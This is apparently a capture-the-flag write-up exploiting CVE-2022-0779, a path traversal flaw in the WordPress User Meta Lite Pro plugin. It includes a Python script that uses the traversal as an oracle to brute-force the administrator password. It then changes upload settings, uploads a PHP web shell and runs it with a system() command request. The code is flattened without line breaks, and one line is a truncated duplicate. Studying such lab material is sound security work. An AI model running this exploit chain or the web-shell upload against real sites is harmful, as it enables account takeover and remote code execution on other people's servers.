Test site: WordPress User Meta Lite Pro 2.4.3 Path Traversal Vulnerability CVE-2022-0779

Initialize questions first

Get administrator account password

Register a user

Login user

Capture the uploaded data package

Then send, intercept a packet with action=um_show_uploaded_file

According to the home page information, you can get the administrator's username

Using the CVE-2022-0779 Path traversal vulnerability, if this file exists, then Remove will be displayed, if there is no such file, there will be no Remove

Blast the password

import requestslis='qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'password=''url="http://ip:port/wp-admin/admin-ajax.php"header={'Host': 'ip:port','X-Requested-With': 'XMLHttpRequest','User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36','Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8','Origin': 'http://ip:port','Referer': 'http://ip:port/index.php/upload/','Cookie':'wordpress_dbc1caa18716ea65bde64c8be124687e=11111%7C1656204437%7C4gKvb9ukdHPHLGoZmUck6b0HQLuzMAWGMwrLzcOz6ut%7C773b42bf40849a9d6365ec60b43eb256204f1c41a3c52103702ac0ea8b910a85; wordpress_logged_in_dbc1caa18716ea65bde64c8be124687e=11111%7C1656204437%7C4gKvb9ukdHPHLGoZmUck6b0HQLuzMAWGMwrLzcOz6ut%7C46c1c28f20badcb553d1aef7f4ee2f926b5a6b9cb83e0f934a230f38d30a88cc'}for i in range (1,16):for s in lis:datas="field_name=upload&filepath=/../../../../../../../password/"+str(i)+s+"&field_id=um_field_2&form_key=upload&action=um_show_uploaded_file&pf_nonce=8a8f9c780f&is_ajax=true"result=requests.post(url,data=datas,headers=header)if 'Remove' in result.text:password+=sbreakprint(password)

Upload a Trojan horse

Modify upload file settings

Then enter the page to update

Upload a sentence Trojan

Get flag

Go to wp-content/uploads/file/2.php

wp-content/uploads/files/2.php?cmd=system(%22grep%20-r%20flag{%20/usr/*%22);

oads/file/2.php

wp-content/uploads/files/2.php?cmd=system(%22grep%20-r%20flag{%20/usr/*%22);